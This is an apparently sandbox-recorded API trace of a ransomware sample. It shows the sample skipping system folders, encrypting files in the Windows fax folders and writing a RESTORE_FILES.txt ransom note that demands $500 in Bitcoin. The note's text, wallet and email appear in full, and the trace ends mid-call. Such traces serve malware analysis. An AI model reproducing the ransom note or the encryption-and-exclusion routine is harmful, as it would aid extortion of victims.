[0072.087] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.087] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.087] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.087] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.088] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.088] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\.") returned 65 [0072.088] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.088] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0072.088] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.088] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.088] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.088] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.088] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.088] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\..") returned 66 [0072.088] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.088] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.088] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0072.088] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0072.088] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0072.088] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0072.088] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0072.088] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0072.088] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US") returned 69 [0072.088] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0072.088] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0072.089] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*") returned 71 [0072.089] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x4a9210 [0072.089] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.089] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.089] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.089] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.089] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.089] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\.") returned 71 [0072.089] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.089] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0072.089] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.089] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.089] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.089] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.089] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.089] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\..") returned 72 [0072.089] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.089] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.089] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0072.089] lstrcmpiW (lpString1="confident.cov", lpString2="Windows") returned -1 [0072.089] lstrcmpiW (lpString1="confident.cov", lpString2="Program Files") returned -1 [0072.089] lstrcmpiW (lpString1="confident.cov", lpString2="Program Files (x86)") returned -1 [0072.089] lstrcmpiW (lpString1="confident.cov", lpString2="$Recycle.bin") returned 1 [0072.089] lstrcmpiW (lpString1="confident.cov", lpString2="System Volume Information") returned -1 [0072.089] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov") returned 83 [0072.089] StrStrIW (lpFirst="confident.cov", lpSrch=".protected") returned 0x0 [0072.089] lstrcmpW (lpString1="confident.cov", lpString2="RESTORE_FILES.txt") returned -1 [0072.089] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0072.090] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0072.090] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\confident.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.090] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0072.090] lstrcmpiW (lpString1="fyi.cov", lpString2="Windows") returned -1 [0072.090] lstrcmpiW (lpString1="fyi.cov", lpString2="Program Files") returned -1 [0072.090] lstrcmpiW (lpString1="fyi.cov", lpString2="Program Files (x86)") returned -1 [0072.090] lstrcmpiW (lpString1="fyi.cov", lpString2="$Recycle.bin") returned 1 [0072.090] lstrcmpiW (lpString1="fyi.cov", lpString2="System Volume Information") returned -1 [0072.090] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov") returned 77 [0072.090] StrStrIW (lpFirst="fyi.cov", lpSrch=".protected") returned 0x0 [0072.090] lstrcmpW (lpString1="fyi.cov", lpString2="RESTORE_FILES.txt") returned -1 [0072.090] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0072.090] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0072.090] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\fyi.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.091] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0072.091] lstrcmpiW (lpString1="generic.cov", lpString2="Windows") returned -1 [0072.091] lstrcmpiW (lpString1="generic.cov", lpString2="Program Files") returned -1 [0072.091] lstrcmpiW (lpString1="generic.cov", lpString2="Program Files (x86)") returned -1 [0072.091] lstrcmpiW (lpString1="generic.cov", lpString2="$Recycle.bin") returned 1 [0072.091] lstrcmpiW (lpString1="generic.cov", lpString2="System Volume Information") returned -1 [0072.091] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov") returned 81 [0072.091] StrStrIW (lpFirst="generic.cov", lpSrch=".protected") returned 0x0 [0072.091] lstrcmpW (lpString1="generic.cov", lpString2="RESTORE_FILES.txt") returned -1 [0072.091] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0072.091] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0072.091] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\generic.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.091] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0072.091] lstrcmpiW (lpString1="urgent.cov", lpString2="Windows") returned -1 [0072.091] lstrcmpiW (lpString1="urgent.cov", lpString2="Program Files") returned 1 [0072.091] lstrcmpiW (lpString1="urgent.cov", lpString2="Program Files (x86)") returned 1 [0072.091] lstrcmpiW (lpString1="urgent.cov", lpString2="$Recycle.bin") returned 1 [0072.091] lstrcmpiW (lpString1="urgent.cov", lpString2="System Volume Information") returned 1 [0072.091] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov") returned 80 [0072.091] StrStrIW (lpFirst="urgent.cov", lpSrch=".protected") returned 0x0 [0072.091] lstrcmpW (lpString1="urgent.cov", lpString2="RESTORE_FILES.txt") returned 1 [0072.091] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0072.091] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0072.091] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\urgent.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.091] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0072.091] FindClose (in: hFindFile=0x4a9210 | out: hFindFile=0x4a9210) returned 1 [0072.091] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\RESTORE_FILES.txt") returned 87 [0072.092] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0072.092] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.092] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0072.092] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0072.093] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0072.093] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.093] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0072.093] CloseHandle (hObject=0xd8) returned 1 [0072.093] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0072.093] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0072.093] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\RESTORE_FILES.txt") returned 81 [0072.093] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0072.094] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.094] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0072.094] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0072.094] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0072.094] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.094] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0072.094] CloseHandle (hObject=0xd4) returned 1 [0072.111] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0072.111] lstrcmpiW (lpString1="Inbox", lpString2="Windows") returned -1 [0072.111] lstrcmpiW (lpString1="Inbox", lpString2="Program Files") returned -1 [0072.111] lstrcmpiW (lpString1="Inbox", lpString2="Program Files (x86)") returned -1 [0072.111] lstrcmpiW (lpString1="Inbox", lpString2="$Recycle.bin") returned 1 [0072.111] lstrcmpiW (lpString1="Inbox", lpString2="System Volume Information") returned -1 [0072.111] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox") returned 51 [0072.111] lstrcmpW (lpString1="Inbox", lpString2=".") returned 1 [0072.111] lstrcmpW (lpString1="Inbox", lpString2="..") returned 1 [0072.111] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\*") returned 53 [0072.111] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0072.112] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.112] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.112] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.112] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.112] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.112] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\.") returned 53 [0072.112] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.112] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0072.112] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.112] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.112] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.112] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.112] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.112] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\..") returned 54 [0072.112] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.112] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.112] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0072.112] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0072.113] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\RESTORE_FILES.txt") returned 69 [0072.113] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\inbox\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0072.113] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.113] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0072.114] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0072.114] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0072.114] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.114] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0072.114] CloseHandle (hObject=0xd4) returned 1 [0072.114] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0072.114] lstrcmpiW (lpString1="Queue", lpString2="Windows") returned -1 [0072.114] lstrcmpiW (lpString1="Queue", lpString2="Program Files") returned 1 [0072.114] lstrcmpiW (lpString1="Queue", lpString2="Program Files (x86)") returned 1 [0072.114] lstrcmpiW (lpString1="Queue", lpString2="$Recycle.bin") returned 1 [0072.114] lstrcmpiW (lpString1="Queue", lpString2="System Volume Information") returned -1 [0072.114] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue") returned 51 [0072.114] lstrcmpW (lpString1="Queue", lpString2=".") returned 1 [0072.114] lstrcmpW (lpString1="Queue", lpString2="..") returned 1 [0072.114] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\*") returned 53 [0072.114] FindFirstFileW (in: 